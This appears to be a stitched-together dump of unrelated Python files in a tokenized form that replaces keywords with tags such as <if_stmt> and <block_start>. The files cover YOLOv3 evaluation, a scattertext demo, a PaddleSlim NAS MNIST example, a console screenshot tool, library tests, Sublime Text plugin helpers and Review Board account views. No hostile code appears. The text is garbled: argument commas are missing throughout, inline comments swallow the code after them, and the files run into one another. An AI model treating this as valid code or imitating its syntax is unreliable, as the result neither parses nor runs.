annotation[1:]])<if_stmt>len(bbox_data_gt)<eq>0<block_start>bboxes_gt=[]<line_sep>classes_gt=[]<block_end><else_stmt><block_start>bboxes_gt,classes_gt=bbox_data_gt[: :4] bbox_data_gt[: 4]<block_end>num_bbox_gt=len(bboxes_gt)<line_sep># output ground-truth self.ground_truth_file.write(str(num)+":\n")<for_stmt>i range(num_bbox_gt)<block_start>class_name=self.classes[classes_gt[i]]<line_sep>xmin,ymin,xmax,ymax=list(map(str bboxes_gt[i]))<line_sep>bbox_mess=",".join([class_name xmin ymin xmax ymax])+"\n"<line_sep>self.ground_truth_file.write(bbox_mess)<block_end>image_copy=np.copy(image)<line_sep>org_h,org_w,_=image.shape<line_sep>image_data=utils.resize_image(image_copy [self.input_size self.input_size])<line_sep># we don't want to pass metadata through pipeline # so we'll keep it with a dictionary self.meta_dict[num]=[org_h org_w image_name line]<line_sep>image_datas.append(image_data)<line_sep>nums.append(num)<if_stmt>len(nums)<l>self.batch_size<block_start><if_stmt>num<l>len(self.lines)-1<block_start><continue><block_end><else_stmt># if there's not enough data to fill the last batch # we repeat the last image to yield a full sized batch <block_start><for_stmt>_ range(len(image_datas) self.batch_size)<block_start>image_datas.append(image_datas[-1])<line_sep>nums.append(nums[-1])<block_end><block_end><block_end>image_datas=np.array(image_datas).astype(np.float16)<line_sep><yield>(image_datas nums)<if_stmt>num<l>len(self.lines)-1<block_start>image_datas=[]<line_sep>nums=[]<block_end><block_end><while_stmt><true># if using infeed_queue. it will need more batches # to padd the data and meet the required repeat_count # so we will use last batch for padding <block_start><yield>(image_datas nums)<block_end><block_end><def_stmt>parse_result self pred_sbbox_list pred_mbbox_list pred_lbbox_list nums<block_start>"""Parse and write predicted result """<for_stmt>i range(len(nums))# if nums value is repeated # that means nums[i] is a repeated value for matching required batch size # so we can stop the iteration <block_start><if_stmt>i<g>0<and>nums[i]<le>nums[i-1]<block_start><break><block_end>num=nums[i]<line_sep>pred_sbbox=pred_sbbox_list[i]<line_sep>pred_mbbox=pred_mbbox_list[i]<line_sep>pred_lbbox=pred_lbbox_list[i]<line_sep>org_h,org_w,image_name,line=self.meta_dict[num]<line_sep>image_path=line.strip().split()[0]<line_sep>image=self.image_dict[line.strip()]<line_sep>pred_bbox=np.concatenate([np.reshape(pred_sbbox (-1 5+self.num_classes)) np.reshape(pred_mbbox (-1 5+self.num_classes)) np.reshape(pred_lbbox (-1 5+self.num_classes))] axis=0)<line_sep># convert boxes from input_image coordinate to original image coordinate bboxes=utils.postprocess_boxes(pred_bbox (org_h org_w) self.input_size self.score_threshold)<line_sep>bboxes_pr=utils.nms(bboxes self.iou_threshold)<if_stmt>self.write_image<block_start>image=utils.draw_bbox(image bboxes_pr self.classes show_label=self.show_label)<line_sep>cv2.imwrite(self.write_image_path+image_name image)<block_end>self.predict_result_file.write(str(num)+":\n")<for_stmt>bbox bboxes_pr<block_start>coor=np.array(bbox[:4] dtype=np.int32)<line_sep>score=bbox[4]<line_sep>class_ind=int(bbox[5])<line_sep>class_name=self.classes[class_ind]<line_sep>score="%.4f"%score<line_sep>xmin,ymin,xmax,ymax=list(map(str coor))<line_sep>bbox_mess=",".join([class_name score xmin ymin xmax ymax])+"\n"<line_sep>self.predict_result_file.write(bbox_mess)<block_end><block_end><block_end><def_stmt>evaluate self<block_start>self.predict_result_file=open(self.predicted_file_path "w")<if_stmt>self.use_infeed_queue# using infeed queue to improve throughput # we can use an additional thread to run dequeue_outfeed for decrease latency and further improve throughput <block_start>total_samples=len(self.lines)<line_sep>interaction_samples=self.batch_size<times>self.repeat_count<line_sep>total_interactions=total_samples/interaction_samples<line_sep>total_interactions=math.ceil(total_interactions)<for_stmt>interaction_index range(total_interactions)<block_start>run_start=time.time()<line_sep>self.sess.run(self.run_loop)<line_sep>result=self.sess.run(self.dequeue_outfeed)<line_sep>run_duration=time.time()-run_start<line_sep>pred_sbbox_list,pred_mbbox_list,pred_lbbox_list,nums=result["pred_sbbox"] result["pred_mbbox"] result["pred_lbbox"] result["nums"]<for_stmt>i range(len(nums))# len(nums) == repeat_count # there's repeat count number of batches for each run <block_start><if_stmt>i<g>0<and>nums[i][0]<le>nums[i-1][0]# ignore repeated data # these are only for meeting data size required when using ipu.loops.repeat <block_start><break><block_end>self.parse_result(pred_sbbox_list[i] pred_mbbox_list[i] pred_lbbox_list[i] nums[i])<block_end>logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}, repeat count: {}".format((interaction_index+1)<times>interaction_samples len(self.lines) run_duration interaction_samples/run_duration self.batch_size self.repeat_count))<block_end><block_end><else_stmt># if not use infeed_queue, it will return for every batch <block_start>data_gen=self.data_generator()<line_sep>interaction_samples=self.batch_size<line_sep>total_interactions=math.ceil(len(self.lines)/interaction_samples)<for_stmt>interaction_index range(total_interactions)<block_start>image_datas,nums=next(data_gen)<line_sep>run_start=time.time()<line_sep>pred_sbbox_list,pred_mbbox_list,pred_lbbox_list,nums=self.sess.run(self.output feed_dict={self.input_data:image_datas self.nums:nums})<line_sep>run_duration=time.time()-run_start<line_sep>self.parse_result(pred_sbbox_list pred_mbbox_list pred_lbbox_list nums)<line_sep>logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}".format((interaction_index+1)<times>interaction_samples len(self.lines) run_duration interaction_samples/run_duration self.batch_size))<block_end><block_end>self.ground_truth_file.close()<line_sep>self.predict_result_file.close()<line_sep>self.sess.close()<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser(description="evaluation in TensorFlow" add_help=<false>)<line_sep>parser.add_argument("--config" type=str default="config/config_800.json" help="json config file for yolov3.")<line_sep>parser.add_argument("--test_path" type=str default="./data/dataset/voc_test.txt" help="data path for test")<line_sep>arguments=parser.parse_args()<with_stmt>open(arguments.config)<as>f<block_start>opts=json.load(f)<block_end>opts['test']['annot_path']=arguments.test_path<line_sep>YoloTest(opts).evaluate()<block_end>
# https://leetcode.com/problems/generate-a-string-with-characters-that-have-odd-counts <def_stmt>generate_the_string n<block_start><if_stmt>n%2<eq>0<block_start><return>'a'<times>(n-1)+'b'<block_end><return>'a'<times>n<block_end>
<import_from_stmt>.repository SQLAlchemyMetaRepository<line_sep>__all__=['SQLAlchemyMetaRepository']<line_sep>
<import_stmt>scattertext<as>st<import_from_stmt>scattertext RankDifference<line_sep>convention_df=st.SampleCorpora.ConventionData2012.get_data()<line_sep>convention_df['parse']=convention_df['text'].apply(st.whitespace_nlp_with_sentences)<line_sep>unigram_corpus=(st.CorpusFromParsedDocuments(convention_df category_col='party' parsed_col='parse').build().get_stoplisted_unigram_corpus())<line_sep>topic_model=(st.SentencesForTopicModeling(unigram_corpus).get_topics_from_terms(['obama' 'romney' 'democrats' 'republicans' 'health' 'military' 'taxes' 'education' 'olympics' 'auto' 'iraq' 'iran' 'israel'] scorer=RankDifference() num_terms_per_topic=20))<line_sep>topic_feature_builder=st.FeatsFromTopicModel(topic_model)<line_sep>topic_corpus=st.CorpusFromParsedDocuments(convention_df category_col='party' parsed_col='parse' feats_from_spacy_doc=topic_feature_builder).build()<line_sep>html=st.produce_scattertext_explorer(topic_corpus category='democrat' category_name='Democratic' not_category_name='Republican' width_in_pixels=1000 metadata=convention_df['speaker'] use_non_text_features=<true> use_full_doc=<true> pmi_threshold_coefficient=0 topic_model_term_lists=topic_feature_builder.get_top_model_term_lists())<line_sep>open('./demo_word_list_topic_model.html' 'wb').write(html.encode('utf-8'))<line_sep>print('Open ./demo_word_list_topic_model.html in Chrome or Firefox.')<line_sep>
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> print_function<import_stmt>argparse<import_stmt>ast<import_stmt>numpy<as>np<import_from_stmt>PIL Image<import_stmt>os<import_stmt>paddle<import_stmt>paddle.fluid<as>fluid<import_from_stmt>paddle.fluid.optimizer AdamOptimizer<import_from_stmt>paddle.fluid.dygraph.nn Conv2D Pool2D Linear<import_from_stmt>paddle.fluid.dygraph.base to_variable<import_from_stmt>paddleslim.nas.one_shot SuperMnasnet<import_from_stmt>paddleslim.nas.one_shot OneShotSearch<def_stmt>parse_args <block_start>parser=argparse.ArgumentParser("Training for Mnist.")<line_sep>parser.add_argument("--use_data_parallel" type=ast.literal_eval default=<false> help="The flag indicating whether to use data parallel mode to train the model.")<line_sep>parser.add_argument("-e" "--epoch" default=5 type=int help="set epoch")<line_sep>parser.add_argument("--ce" action="store_true" help="run ce")<line_sep>args=parser.parse_args()<line_sep><return>args<block_end><class_stmt>SimpleImgConv(fluid.dygraph.Layer)<block_start><def_stmt>__init__ self num_channels num_filters filter_size conv_stride=1 conv_padding=0 conv_dilation=1 conv_groups=1 act=<none> use_cudnn=<false> param_attr=<none> bias_attr=<none><block_start>super(SimpleImgConv self).__init__()<line_sep>self._conv2d=Conv2D(num_channels=num_channels num_filters=num_filters filter_size=filter_size stride=conv_stride padding=conv_padding dilation=conv_dilation groups=conv_groups param_attr=<none> bias_attr=<none> act=act use_cudnn=use_cudnn)<block_end><def_stmt>forward self inputs<block_start>x=self._conv2d(inputs)<line_sep><return>x<block_end><block_end><class_stmt>MNIST(fluid.dygraph.Layer)<block_start><def_stmt>__init__ self<block_start>super(MNIST self).__init__()<line_sep>self._simple_img_conv_pool_1=SimpleImgConv(1 20 2 act="relu")<line_sep>self.arch=SuperMnasnet(name_scope="super_net" input_channels=20 out_channels=20)<line_sep>self._simple_img_conv_pool_2=SimpleImgConv(20 50 2 act="relu")<line_sep>self.pool_2_shape=50<times>13<times>13<line_sep>SIZE=10<line_sep>scale=(2.0/(self.pool_2_shape<power>2<times>SIZE))<power>0.5<line_sep>self._fc=Linear(self.pool_2_shape 10 param_attr=fluid.param_attr.ParamAttr(initializer=fluid.initializer.NormalInitializer(loc=0.0 scale=scale)) act="softmax")<block_end><def_stmt>forward self inputs label=<none> tokens=<none><block_start>x=self._simple_img_conv_pool_1(inputs)<line_sep>x=self.arch(x tokens=tokens)# addddddd x=self._simple_img_conv_pool_2(x)<line_sep>x=fluid.layers.reshape(x shape=[-1 self.pool_2_shape])<line_sep>x=self._fc(x)<if_stmt>label<is><not><none><block_start>acc=fluid.layers.accuracy(input=x label=label)<line_sep><return>x acc<block_end><else_stmt><block_start><return>x<block_end><block_end><block_end><def_stmt>test_mnist model tokens=<none><block_start>acc_set=[]<line_sep>avg_loss_set=[]<line_sep>batch_size=64<line_sep>test_reader=paddle.fluid.io.batch(paddle.dataset.mnist.test() batch_size=batch_size drop_last=<true>)<for_stmt>batch_id,data enumerate(test_reader())<block_start>dy_x_data=np.array([x[0].reshape(1 28 28)<for>x data]).astype('float32')<line_sep>y_data=np.array([x[1]<for>x data]).astype('int64').reshape(batch_size 1)<line_sep>img=to_variable(dy_x_data)<line_sep>label=to_variable(y_data)<line_sep>label.stop_gradient=<true><line_sep>prediction,acc=model.forward(img label tokens=tokens)<line_sep>loss=fluid.layers.cross_entropy(input=prediction label=label)<line_sep>avg_loss=fluid.layers.mean(loss)<line_sep>acc_set.append(float(acc.numpy()))<line_sep>avg_loss_set.append(float(avg_loss.numpy()))<if_stmt>batch_id%100<eq>0<block_start>print("Test - batch_id: {}".format(batch_id))<block_end># get test acc and loss <block_end>acc_val_mean=np.array(acc_set).mean()<line_sep>avg_loss_val_mean=np.array(avg_loss_set).mean()<line_sep><return>acc_val_mean<block_end><def_stmt>train_mnist args model tokens=<none><block_start>epoch_num=args.epoch<line_sep>BATCH_SIZE=64<line_sep>adam=AdamOptimizer(learning_rate=0.001 parameter_list=model.parameters())<line_sep>train_reader=paddle.fluid.io.batch(paddle.dataset.mnist.train() batch_size=BATCH_SIZE drop_last=<true>)<if_stmt>args.use_data_parallel<block_start>train_reader=fluid.contrib.reader.distributed_batch_reader(train_reader)<block_end><for_stmt>epoch range(epoch_num)<block_start><for_stmt>batch_id,data enumerate(train_reader())<block_start>dy_x_data=np.array([x[0].reshape(1 28 28)<for>x data]).astype('float32')<line_sep>y_data=np.array([x[1]<for>x data]).astype('int64').reshape(-1 1)<line_sep>img=to_variable(dy_x_data)<line_sep>label=to_variable(y_data)<line_sep>label.stop_gradient=<true><line_sep>cost,acc=model.forward(img label tokens=tokens)<line_sep>loss=fluid.layers.cross_entropy(cost label)<line_sep>avg_loss=fluid.layers.mean(loss)<if_stmt>args.use_data_parallel<block_start>avg_loss=model.scale_loss(avg_loss)<line_sep>avg_loss.backward()<line_sep>model.apply_collective_grads()<block_end><else_stmt><block_start>avg_loss.backward()<block_end>adam.minimize(avg_loss)<line_sep># save checkpoint model.clear_gradients()<if_stmt>batch_id%1<eq>0<block_start>print("Loss at epoch {} step {}: {:}".format(epoch batch_id avg_loss.numpy()))<block_end><block_end>model.eval()<line_sep>test_acc=test_mnist(model tokens=tokens)<line_sep>model.train()<line_sep>print("Loss at epoch {} , acc is: {}".format(epoch test_acc))<block_end>save_parameters=(<not>args.use_data_parallel)<or>(args.use_data_parallel<and>fluid.dygraph.parallel.Env().local_rank<eq>0)<if_stmt>save_parameters<block_start>fluid.save_dygraph(model.state_dict() "save_temp")<line_sep>print("checkpoint saved")<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>args=parse_args()<line_sep>place=fluid.CPUPlace()<with_stmt>fluid.dygraph.guard(place)<block_start>model=MNIST()<line_sep># step 1: training super net #train_mnist(args, model) # step 2: search best_tokens=OneShotSearch(model test_mnist)<block_end># step 3: final training # train_mnist(args, model, best_tokens) <block_end>
""" cpsg.py ~~~~~~ Concfg Preset Screenshot Generator Only works in pure powershell/pwsh session, does not work in terminal like cmder. Prerequisites: Python3.4+, Pillow, jinja2, pywin32 """<import_stmt>os<import_stmt>sys<import_stmt>glob<import_stmt>time<import_stmt>shutil<import_stmt>argparse<import_stmt>win32gui<import_stmt>subprocess<import_stmt>win32process<import_from_stmt>PIL ImageGrab<import_from_stmt>jinja2 Template<line_sep>LEGACY_PWSH=<false><line_sep>SCRIPT_DIR=os.path.dirname(os.path.realpath(__file__))<line_sep>PRESETS_DIR=os.path.join(SCRIPT_DIR os.pardir 'presets')<line_sep>PRESET_EXAMPLES_DIR=os.path.join(SCRIPT_DIR os.pardir 'preset_examples')<line_sep>SKIP_LIST=['basic' 'basic-reset']<def_stmt>get_hwnds_for_pid pid<block_start><def_stmt>callback hwnd hwnds<block_start><if_stmt>win32gui.IsWindowVisible(hwnd)<and>win32gui.IsWindowEnabled(hwnd)<block_start>_,found_pid=win32process.GetWindowThreadProcessId(hwnd)<if_stmt>found_pid<eq>pid<block_start>hwnds.append(hwnd)<block_end><return><true><block_end><block_end>hwnds=[]<line_sep>win32gui.EnumWindows(callback hwnds)<line_sep><return>hwnds<block_end><def_stmt>get_presets <block_start>files=glob.glob(os.path.join(PRESETS_DIR '*.json'))<line_sep>presets=[]<for_stmt>item files<block_start>presets.append((os.path.splitext(os.path.basename(item))[0] item))<block_end># preset pair list [(name, path), (name, path), ...] <return>presets<block_end><def_stmt>gens_for_preset preset<block_start>exe='powershell'<if>LEGACY_PWSH<else>'pwsh'<line_sep>print("Taking screenshot of preset '{0}'...".format(preset[0]))<line_sep># set color preset pwsh=subprocess.Popen('{0} -noprofile -file {1}/setcolors.ps1 -preset {2}'.format(exe SCRIPT_DIR preset[1]) creationflags=subprocess.CREATE_NEW_CONSOLE)<line_sep># waiting for exit time.sleep(4.0)<line_sep># print out color table then take screenshot pwsh=subprocess.Popen('{0} -noprofile -noexit -file {1}/outcolors.ps1'.format(exe SCRIPT_DIR) creationflags=subprocess.CREATE_NEW_CONSOLE)<line_sep># waiting for process time.sleep(2.0)<for_stmt>hwnd get_hwnds_for_pid(pwsh.pid)<block_start>win32gui.SetForegroundWindow(hwnd)<block_end>bbox=win32gui.GetWindowRect(hwnd)<line_sep># remove window box shadow crop_bbox=(bbox[0]+7 bbox[1] bbox[2]-7 bbox[3]-7)<line_sep>img=ImageGrab.grab(crop_bbox)<if_stmt><not>os.path.exists(PRESET_EXAMPLES_DIR)<block_start>os.makedirs(PRESET_EXAMPLES_DIR)<block_end>img.save(os.path.join(PRESET_EXAMPLES_DIR '{0}.png'.format(preset[0])))<line_sep>pwsh.kill()<block_end><def_stmt>img_dict direntry<block_start><return>{'name':direntry.name.replace('.png' '') 'path':direntry.name}<block_end><def_stmt>is_img direntry<block_start><if_stmt>direntry.is_file<and>direntry.name.endswith('.png')<block_start><return><true><block_end><return><false><block_end><if_stmt>__name__<eq>'__main__'# Usage: python -m cpsg [args] <block_start>parser=argparse.ArgumentParser(description='Concfg Preset Screenshot Generator')<line_sep>parser.add_argument("-a" "--all" help="generate screenshot for all presets" action="store_true")<line_sep>parser.add_argument("-l" "--legacy" help="pass this option if you use Windows PowerShell" action="store_true")<line_sep>parser.add_argument("-p" "--preset" help="generate screenshot for single preset")<line_sep>parser.add_argument("-u" "--update" help="also update the screenshot README" action="store_true")<line_sep>args=parser.parse_args()<if_stmt>args.all<or>args.preset<block_start><if_stmt><not>shutil.which('colortool.exe')<block_start>print("Make sure you have 'ColorTool' installed.")<line_sep>sys.exit(0)<block_end>input("NOTICE: Do not have other operations while the script runs, "<concat>"or it will be interrupted when taking screenshots. "<concat>"Hit Enter to continue: ")<line_sep>presets=get_presets()<if_stmt>args.legacy<block_start>LEGACY_PWSH=<true><block_end><if_stmt>args.all<block_start><for_stmt>item presets# skip non-color presets <block_start><if_stmt><not>item[0]<in>SKIP_LIST<block_start>gens_for_preset(item)<block_end><block_end><block_end><elif_stmt>args.preset# skip non-color presets <block_start><if_stmt><not>args.preset<in>SKIP_LIST<block_start>match=[item<for>item presets<if>item[0]<eq>args.preset]<if_stmt>len(match)<block_start>gens_for_preset(match[0])<block_end><else_stmt><block_start>print("No preset named '{0}'.".format(args.preset))<line_sep>sys.exit(0)<block_end><block_end><block_end><if_stmt>args.update<block_start>print('Updating screenshots README.md...')<line_sep># Get template <with_stmt>open(os.path.join(SCRIPT_DIR 'readme.jinja2'))<as>templateData<block_start>template=Template(templateData.read())<block_end># Get images images=[img_dict(direntry)<for>direntry os.scandir(PRESET_EXAMPLES_DIR)<if>is_img(direntry)]<line_sep>images.sort(key=<lambda>x:x['name'])<line_sep># Generate README <with_stmt>open(os.path.join(PRESET_EXAMPLES_DIR 'README.md') 'w')<as>readme<block_start>readme.write(template.render(images=images))<block_end><block_end><block_end><else_stmt><block_start>parser.print_help()<line_sep>sys.exit(0)<block_end><block_end>
<import_stmt>os<import_stmt>shutil<import_stmt>unittest<import_from_stmt>tests.abstract_resolver AbstractResolverTest<import_from_stmt>loris resolver<class_stmt>SourceImageCachingResolverTest(AbstractResolverTest unittest.TestCase)<block_start><def_stmt>setUp self<block_start>super(SourceImageCachingResolverTest self).setUp()<line_sep>tests_dir=os.path.dirname(os.path.realpath(__file__))<line_sep>self.cache_dir=os.path.join(tests_dir 'cache')<line_sep>config={'source_root':os.path.join(tests_dir 'img') 'cache_root':self.cache_dir}<line_sep>self.identifier='01/02/0001.jp2'<line_sep>self.expected_filepath=os.path.join(self.cache_dir self.identifier)<line_sep>self.not_identifier='DOES_NOT_EXIST.jp2'<line_sep>self.expected_format='jp2'<line_sep>self.resolver=resolver.SourceImageCachingResolver(config)<block_end><def_stmt>test_resolve self<block_start>super(SourceImageCachingResolverTest self).test_resolve()<line_sep># Make sure the file exists in the cache self.assertTrue(os.path.isfile(self.expected_filepath))<block_end><def_stmt>tearDown self# Clean Up the cache directory <block_start><if_stmt>os.path.exists(self.cache_dir)<block_start>shutil.rmtree(self.cache_dir)<block_end><block_end><block_end>
# # Copyright (C) 2021 <NAME> <<EMAIL>> # License: MIT # # pylint: disable=missing-docstring <import_stmt>unittest<import_stmt>anyconfig.api<import_from_stmt>. common<line_sep>LOADER_TYPES=frozenset(anyconfig.api.list_types())<line_sep>@unittest.skipIf('yaml'<not><in>LOADER_TYPES 'yaml loader is not available')<class_stmt>YamlTestCase(common.TestCase)<block_start>kind='yaml'<line_sep>pattern='*.yml'<block_end>@unittest.skipIf('toml'<not><in>LOADER_TYPES 'toml loader is not available')<class_stmt>TomlTestCase(YamlTestCase)<block_start>kind='toml'<line_sep>pattern='*.toml'<block_end># vim:sw=4:ts=4:et:
<import_stmt>sys<import_stmt>os<try_stmt><block_start><import_stmt>sublime<block_end><except_stmt>Exception<block_start><pass><block_end>NEW_ACCOUNT_TXT='''Welcome {username}!\n\nYou're all set to collaborate. You should check out our docs at https://{host}/help/plugins/sublime#usage. You must run 'Floobits - Complete Sign Up' so you can log in to the website.'''<line_sep>LINKED_ACCOUNT_TXT='''Welcome {username}!\n\nYou are all set to collaborate. You may want to check out our docs at https://{host}/help/plugins/sublime#usage'''<def_stmt>name <block_start><if_stmt>sys.version_info<l>(3 0)<block_start>py_version=2<block_end><else_stmt><block_start>py_version=3<block_end><return>'Sublime Text %s'%py_version<block_end><def_stmt>codename <block_start><return>'sublime'<block_end><def_stmt>ok_cancel_dialog dialog<block_start><return>sublime.ok_cancel_dialog(dialog)<block_end><def_stmt>error_message msg<block_start>sublime.error_message(msg)<block_end><def_stmt>status_message msg<block_start>sublime.status_message(msg)<block_end><def_stmt>platform <block_start><return>sublime.platform()<block_end><def_stmt>set_timeout f timeout<block_start>sublime.set_timeout(f timeout)<block_end><def_stmt>call_timeouts <block_start><return><block_end><def_stmt>message_dialog msg<block_start>sublime.message_dialog(msg)<block_end><def_stmt>open_file file<block_start>win=sublime.active_window()<if_stmt>win<block_start>win.open_file(file)<block_end><block_end><def_stmt>get_line_endings path=<none><block_start>ending=sublime.load_settings('Preferences.sublime-settings').get('default_line_ending')<if_stmt>ending<eq>'system'<block_start><return>os.linesep<block_end><if_stmt>ending<eq>'windows'<block_start><return>'\r\n'<block_end><return>'\n'<block_end><def_stmt>select_auth *args<block_start>window,auths,cb=args<if_stmt><not>auths<block_start><return>cb(<none>)<block_end>auths=dict(auths)<for_stmt>k,v auths.items()<block_start>v['host']=k<block_end><if_stmt>len(auths)<eq>1<block_start><return>cb(list(auths.values())[0])<block_end>opts=[[h 'Connect as %s'%a.get('username')]<for>h,a auths.items()]<line_sep>opts.append(['Cancel' ''])<def_stmt>on_account index<block_start><if_stmt>index<l>0<or>index<ge>len(auths)# len(hosts) is cancel, appended to opts at end below <block_start><return>cb(<none>)<block_end>host=opts[index][0]<line_sep><return>cb(auths[host])<block_end>flags=0<if_stmt>hasattr(sublime 'KEEP_OPEN_ON_FOCUS_LOST')<block_start>flags<augor>sublime.KEEP_OPEN_ON_FOCUS_LOST<block_end><return>window.show_quick_panel(opts on_account flags)<block_end>
<import_from_future_stmt> unicode_literals<import_stmt>logging<import_from_stmt>django.conf settings<import_from_stmt>django.contrib.auth.decorators login_required<import_from_stmt>django.contrib.auth.models User<import_from_stmt>django.core.urlresolvers reverse<import_from_stmt>django.forms.forms ErrorDict<import_from_stmt>django.http HttpResponseRedirect<import_from_stmt>django.shortcuts get_object_or_404<import_from_stmt>django.utils six<import_from_stmt>django.utils.decorators method_decorator<import_from_stmt>django.utils.functional cached_property<import_from_stmt>django.utils.safestring mark_safe<import_from_stmt>django.utils.translation ugettext_lazy<as>_<import_from_stmt>django.views.decorators.csrf csrf_protect<import_from_stmt>django.views.generic.base TemplateView<import_from_stmt>djblets.auth.views register<import_from_stmt>djblets.configforms.views ConfigPagesView<import_from_stmt>djblets.features.decorators feature_required<import_from_stmt>djblets.forms.fieldsets filter_fieldsets<import_from_stmt>djblets.siteconfig.models SiteConfiguration<import_from_stmt>djblets.util.compat.django.shortcuts render<import_from_stmt>djblets.util.decorators augment_method_from<import_from_stmt>djblets.views.generic.etag ETagViewMixin<import_from_stmt>reviewboard.accounts.backends get_enabled_auth_backends<import_from_stmt>reviewboard.accounts.forms.registration RegistrationForm<import_from_stmt>reviewboard.accounts.mixins CheckLoginRequiredViewMixin<import_from_stmt>reviewboard.accounts.models Profile<import_from_stmt>reviewboard.accounts.pages AccountPage OAuth2Page PrivacyPage<import_from_stmt>reviewboard.accounts.privacy is_consent_missing<import_from_stmt>reviewboard.admin.decorators check_read_only<import_from_stmt>reviewboard.avatars avatar_services<import_from_stmt>reviewboard.notifications.email.decorators preview_email<import_from_stmt>reviewboard.notifications.email.message prepare_password_changed_mail<import_from_stmt>reviewboard.oauth.features oauth2_service_feature<import_from_stmt>reviewboard.oauth.forms UserApplicationChangeForm UserApplicationCreationForm <import_from_stmt>reviewboard.oauth.models Application<import_from_stmt>reviewboard.site.mixins CheckLocalSiteAccessViewMixin<import_from_stmt>reviewboard.site.urlresolvers local_site_reverse<class_stmt>UserInfoboxView(CheckLoginRequiredViewMixin CheckLocalSiteAccessViewMixin ETagViewMixin TemplateView)<block_start>"""Displays information on a user, for use in user pop-up infoboxes. This is meant to be embedded in other pages, rather than being a standalone page. """<line_sep>template_name='accounts/user_infobox.html'<def_stmt>__init__ self **kwargs<block_start>"""Initialize a view for the request. Args: **kwargs (dict): Keyword arguments passed to :py:meth:`as_view`. """<line_sep>super(UserInfoboxView self).__init__(**kwargs)<line_sep>self._lookup_user=<none><line_sep>self._show_profile=<none><line_sep>self._timezone=<none><block_end><def_stmt>get_etag_data self request username *args **kwargs<block_start>"""Return an ETag for the view. This will look up some state needed for the request and generate a suitable ETag. Args: request (django.http.HttpRequest): The HTTP request from the client. username (unicode): The username of the user being looked up. *args (tuple): Positional arguments to pass to the handler. **kwargs (tuple): Keyword arguments to pass to the handler. These will be arguments provided by the URL pattern. Returns: unicode: The ETag for the page. """<import_from_stmt>reviewboard.extensions.hooks UserInfoboxHook<line_sep>user=get_object_or_404(User username=username)<line_sep>self._lookup_user=user<line_sep>profile=user.get_profile()<line_sep>self._show_profile=user.is_profile_visible(request.user)<line_sep>self._timezone=profile.timezone<line_sep>etag_data=[user.first_name user.last_name user.email six.text_type(user.last_login) six.text_type(settings.TEMPLATE_SERIAL) six.text_type(self._show_profile) self._timezone ]<if_stmt>avatar_services.avatars_enabled<block_start>avatar_service=avatar_services.for_user(user)<if_stmt>avatar_service<block_start>etag_data.extend(avatar_service.get_etag_data(user))<block_end><block_end>local_site=self.local_site<for_stmt>hook UserInfoboxHook.hooks<block_start><try_stmt><block_start>etag_data.append(hook.get_etag_data(user=user request=request local_site=local_site))<block_end><except_stmt>Exception<as>e<block_start>logging.exception('Error when running UserInfoboxHook.'<concat>'get_etag_data method in extension "%s": %s' hook.extension.id e)<block_end><block_end><return>':'.join(etag_data)<block_end><def_stmt>get_context_data self **kwargs<block_start>"""Return data for the template. This will return information on the user, along with information from any extension hooks used for the page. Args: **kwargs (tuple): Additional keyword arguments from the URL pattern. Returns: dict: Context data for the template. """<import_from_stmt>reviewboard.extensions.hooks UserInfoboxHook<line_sep># These are accessed several times, so bring them in to reduce # attribute lookups. user=self._lookup_user<line_sep>username=user.username<line_sep>local_site=self.local_site<line_sep>extra_content=[]<for_stmt>hook UserInfoboxHook.hooks<block_start><try_stmt><block_start>extra_content.append(hook.render(user=user request=self.request local_site=local_site))<block_end><except_stmt>Exception<as>e<block_start>logging.exception('Error when running UserInfoboxHook.'<concat>'render method in extension "%s": %s' hook.extension.id e)<block_end><block_end>review_requests_url=local_site_reverse('user' local_site=local_site args=[username])<line_sep>reviews_url=local_site_reverse('user-grid' local_site=local_site args=[username 'reviews'])<line_sep>has_avatar=(avatar_services.avatars_enabled<and>avatar_services.for_user(user)<is><not><none>)<line_sep><return>{'extra_content':mark_safe(''.join(extra_content)) 'full_name':user.get_full_name() 'has_avatar':has_avatar 'infobox_user':user 'review_requests_url':review_requests_url 'reviews_url':reviews_url 'show_profile':self._show_profile 'timezone':self._timezone }<block_end><block_end>@csrf_protect<def_stmt>account_register request next_url='dashboard'<block_start>"""Display the appropriate registration page. If registration is enabled and the selected authentication backend supports creation of users, this will return the appropriate registration page. If registration is not supported, this will redirect to the login view. """<line_sep>siteconfig=SiteConfiguration.objects.get_current()<line_sep>auth_backends=get_enabled_auth_backends()<if_stmt>(auth_backends[0].supports_registration<and>siteconfig.get('auth_enable_registration')<and><not>siteconfig.get('site_read_only'))<block_start>response=register(request next_page=reverse(next_url) form_class=RegistrationForm)<line_sep><return>response<block_end><return>HttpResponseRedirect(reverse("login"))<block_end><class_stmt>MyAccountView(ConfigPagesView)<block_start>"""Displays the My Account page containing user preferences. The page will be built based on registered pages and forms. This makes it easy to plug in new bits of UI for the page, which is handy for extensions that want to offer customization for users. """<line_sep>title=_('My Account')<line_sep>css_bundle_names=['account-page' ]<line_sep>js_bundle_names=['3rdparty-jsonlint' 'config-forms' 'account-page' ]<line_sep>@method_decorator(login_required)@method_decorator(check_read_only)@augment_method_from(ConfigPagesView)<def_stmt>dispatch self *args **kwargs<block_start>"""Handle the view. This just falls back to the djblets ConfigPagesView.dispatch implementation. """<line_sep><pass><block_end>@property<def_stmt>nav_title self<block_start>"""Get the title for the navigation section."""<line_sep><return>self.request.user.username<block_end>@property<def_stmt>page_classes self<block_start>"""The list of page classes for this view. If the user is missing any consent requirements or has not accepted the privacy policy/terms of service, only the privacy page will be shown. """<if_stmt>self.is_user_missing_consent<block_start><return>[AccountPage.registry.get('page_id' PrivacyPage.page_id)]<block_end><return>list(AccountPage.registry)<block_end>@cached_property<def_stmt>ordered_user_local_sites self<block_start>"""Get the user's local sites, ordered by name."""<line_sep><return>self.request.user.local_site.order_by('name')<block_end>@property<def_stmt>render_sidebar self<block_start>"""Whether or not to render the sidebar. If the user is missing any consent requirements or has not accepted the privacy policy/terms of service, the sidebar will not render. 